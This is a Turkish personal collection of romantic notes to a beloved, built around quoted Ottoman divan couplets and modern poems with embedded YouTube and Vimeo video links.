Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDar\u0131lma, i\u015fte b\u00f6yle... 
+\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::rxamCTtodME[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirka\u00e7 zorlu\u011fun i\u00e7inde kula\u00e7 atarken durdum, fark\u0131na vard\u0131m. \n\n_\"Sevgili Dost,_ +\n_Sen laz\u0131ms\u0131n bana! Ve \u00f6nemlisin hadiselerden.\"_\n\n_\"Sevgili Dost,_ +\n_Bug\u00fcn yazmak de\u011fil, konu\u015fmak istiyordum seninle. Ama yine yazd\u0131m.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::247592380[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::FfgLSNglfsY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMihrimah'da bulsa v\u00fccut.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNah\u00eef\u00ee sormu\u015f: +\n_\"G\u00f6z g\u00f6rd\u00fc g\u00f6n\u00fcl sevdi seni ey y\u00fcz\u00fc m\u00e2h\u0131m_ +\n_Kurb\u00e2n\u0131n olam var m\u0131 benim bunda g\u00fcn\u00e2h\u0131m\"_\u00a0\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Mevlam kulu sevdim seni_ \n\nvideo::MUZBPnjgzhw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAhmet Muhip Dranas'tan :\n\n_\"Bir g\u00fczelim sensin, bir de g\u00f6ky\u00fcz\u00fc,_ +\n_Gerisi denizler \u00f6tesi, hepsi._ +\n_G\u00f6ky\u00fcz\u00fcy\u00fcm g\u00fcnd\u00fcz\u00fcyle, gecesiyle,_ +\n_Sen g\u00fczelim a\u015fk\u0131yla, ne\u015fesiyle_ +\n_Uyumlu, esgin, el ele, ikiniz,_ +\n_Umutlarla bezer, g\u00f6nendirirsiniz_ +\n_\u00d6mr\u00fcm\u00fc, k\u0131y\u0131s\u0131nda bir ak\u015fam\u0131n.\"_ 
\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe desin bu fakir, d\u00fc\u011f\u00fcm d\u00fc\u011f\u00fcm olmu\u015fsa dili? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::-mZqs6VEwRk[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"kalbimin h\u00fcsn\u00fcyusuf mahrem bah\u00e7elerinde derindesin, r\u00fcya kadar derinde\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKendine k\u0131zan insan\u0131 ne geri \u00e7evirir bundan? Yap\u0131lan hatan\u0131n telafisi \u00f6z\u00fcr de\u011fil, biliyor hata yapan. Peki telafisi var m\u0131d\u0131r, bilmiyor.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa\u011fmurda y\u00fcr\u00fcyene, +\n_\"G\u00fcl\u00fc\u015f\u00fcne ya\u011fmur damlas\u0131 \u00e7arpsa,_ +\n_\u015eiir olur._ +\n_Bunu bir ben bilirim,_ +\n_Bir de g\u00f6ky\u00fcz\u00fc.\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Kanat tak\u0131p u\u00e7urur da bu d\u00fc\u015fler_ +\n_Uyand\u0131r\u0131r en tatl\u0131 yerinde_ +\n_G\u00fcn ortas\u0131nda sabah seherinde_ +\n_Hat\u0131rlan\u0131r yeniden_\n\nvideo::2H1oTjQ7fsI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::yKMDy_AigLQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kOxKvZJrUpA[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Z\u00fclf-i siyah\u0131 s\u00e2ye-i perr-i H\u00fcm\u00e2 imi\u015f_ +\n_\u0130kl\u00eem-i h\u00fcsne anun i\u00e7\u00fcn p\u00e2di\u015f\u00e2 
imi\u015f\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::PNTW_77bOho[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kU4ppB06qMc[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_G\u00fcn geldiyse..._\n\nvideo::e-Y0IEoczj8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Sana gelirim_\n\nvideo::251945761[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBundand\u0131r g\u00fczel ad\u0131n\u0131z oldu nihan. \n\nhttps:\/\/twitter.com\/iskenderpalanet\/status\/767788983829102592\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nOlmaz bilirim. Hem kendime hem m\u00e2h\u0131ma bir hat\u0131rlatma sadece: +\n_\"H\u00e2t\u0131r\u0131ndan \u00e7\u0131kmas\u0131n lutfet hem\u00e2n mehc\u00fbr olan_ +\n_Olmas\u0131n b\u00e2r\u00ee g\u00f6n\u00fclden d\u00fbr g\u00f6zden d\u00fbr olan\"_ +\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHamd et ey hakir g\u00f6nl\u00fcm \u00f6mr\u00fcnce, kafi gelmese de... Nas\u0131l s\u0131\u011fd\u0131rd\u0131n bir m\u00e2h\u0131 g\u00f6nl\u00fcne, nas\u0131l girdin bir m\u00e2h\u0131n g\u00f6nl\u00fcne? Hamd olsun... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Gel\" dese gitmez misin? +\nKo\u015fa ko\u015fa gidilir izin \u00e7\u0131ksa. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEsir-i z\u00fclf\u00fcn\u00fcm... 
\n\nvideo::R_aC7EFFACM[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSan\u0131rlar ki k\u0131zg\u0131n ve k\u0131rg\u0131n\u0131m. Asla! Bir de b\u00f6yle s\u00f6yleyelim ki ikna olunsun.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::ci2pe08q61M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nB\u00e2k\u00ee'den \u00e7al\u0131p s\u00f6ylesem \u00e7ok mudur? +\n\n_\"Hep senin\u00e7\u00fcnd\u00fcr benim d\u00fcnya cef\u00e2s\u0131n \u00e7ekti\u011fim_ +\n_Yoksa \u00f6mr\u00fcm var\u0131 sensiz neylerim d\u00fcny\u00e2y\u0131 ben\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKar nas\u0131l yakar insan\u0131n i\u00e7ini? Hat\u0131ra geldik\u00e7e bir sevin\u00e7 bir \u00f6zlem.\n\nvideo::255248711[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6zledim...\n\nvideo::255248790[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::efpvLTrg7_o[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcnayd\u0131n...\ud83c\udf38\ud83c\udf3a \n\nvideo::m9gZyhNPYdY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBekir Bey de olmasa nas\u0131l derdim ben? \n\nvideo::2AE9iCE0Asw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHuzuru sesinizde bulmu\u015fum efendim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir zamanlar, kimine k\u0131sa kimine uzundu vakitler. 
Kimi saniyelerle tartard\u0131 vakti bir avare nefesle, kalbin her at\u0131m\u0131yla. Yanmak m\u0131 denir, t\u00fctmek mi bilmezdi, bilmez. \u0130\u015fte o zamanlar bir ses duyar\u0131m, ah O'ndan bir iz bulurum diye d\u00fc\u015ft\u00fc\u011f\u00fc \u00e7emende \u015f\u00f6yle deyivermi\u015f O, eh fukara g\u00f6n\u00fcl bu bana olayd\u0131 ke\u015fke demi\u015f i\u00e7ini \u00e7ekerek: +\n\n_\"Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nSonras\u0131nda haddini a\u015f\u0131p \u015f\u00f6yle yaz\u0131vermi\u015f bizim pervaneve\u015f g\u00f6n\u00fcl sahibi: +\n\n_\"Hayalinde vard\u0131r a\u015f\u0131kun vuslat ey ahsen_ +\n_Ma\u015fuk okur mektubu h\u00e2kister-i kefterden_ +\n_Ama naz ed\u00fcp a\u015f\u0131k\u0131na elem ilen dersin sen_ +\n_Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nB\u00f6ylesine hadsizli\u011fe iten de nedir bizim avareyi?\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSadettin Hoca dinletiverdi: \n\n_\"A\u015fk\u0131nd\u0131r bana g\u00fczelim y\u00e2dig\u00e2r\"_\n\nvideo::rdn0VZuoiss[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki do\u011fmu\u015f o Mahr\u00fb! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir yan\u0131 siz olan \"biz\"ler ne g\u00fczel.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi geceler, Allah'a emanet olunuz. Zat\u0131n\u0131za ho\u015f\u00e7a bak\u0131n \ud83d\ude0a\ud83d\ude0a \n\n_Sizi rahats\u0131z etmekten \u00e7ekinerek buraya d\u00fc\u015f\u00fcrd\u00fcm yolumu. Art\u0131k ne vakit u\u011frad\u0131ysan\u0131z \u00f6yle olsun. \u0130yi sabahlar, iyi ak\u015famlar, iyi g\u00fcnler..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-Ne dersin Pervane, bizim de pabucumuz dama at\u0131l\u0131r m\u0131? +\n-Sen kendi derdine yan efendi. Ben hep yan\u0131nday\u0131m Mahr\u00fb'nun. Hem ne utanmaz adams\u0131n sen, sabiyi mi k\u0131skanacaks\u0131n? +\n-Aman esta\u011ffurullah yanl\u0131\u015f anlatt\u0131m galiba. K\u0131skanmak de\u011fil benimki. Kenara itilmekten korkmak sadece. Hem o minik masumu, teyzo\u015funun g\u00f6rmesini koklamas\u0131n\u0131 ne kadar istedi\u011fimi bilmez gibi konu\u015fuyorsun. Demem o ki sen yan\u0131na u\u011frars\u0131n mutlaka halimi arz et. 
\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::D9A6zrFojj8[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nLet the clock keep dying for it to strike 3; today let me call out to you from here, shall I, my lady?\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nWhat is the phrase \"Don't be cross 👀\" if not a joke? When the occasion calls for it, be cross, knit your brows, my lady. But know this: if for a moment he has ever erred, this Pervane has never erred on purpose.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nNecati Beg, how right you are; the morning breeze must be called to account. \n\n_O breeze, did you find the dust of her feet lying in the wild_ +\n_Why give that kohl away for free to every eye_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy dear lady\n\nvideo::2hq8rHNsxfw[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHow did the word _mübtelâ_ go again? What need to rummage through dictionaries for its meaning, when one can simply look at this poor wretch and see. \n\nvideo::Ebvr2nFovCM[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::hcRl8wsIlAs[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nVery well then, my lady. That is, God willing :))\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nFuzuli wrote the first line looking at me, that much I understood; but the second line, I wonder, is it for you? 
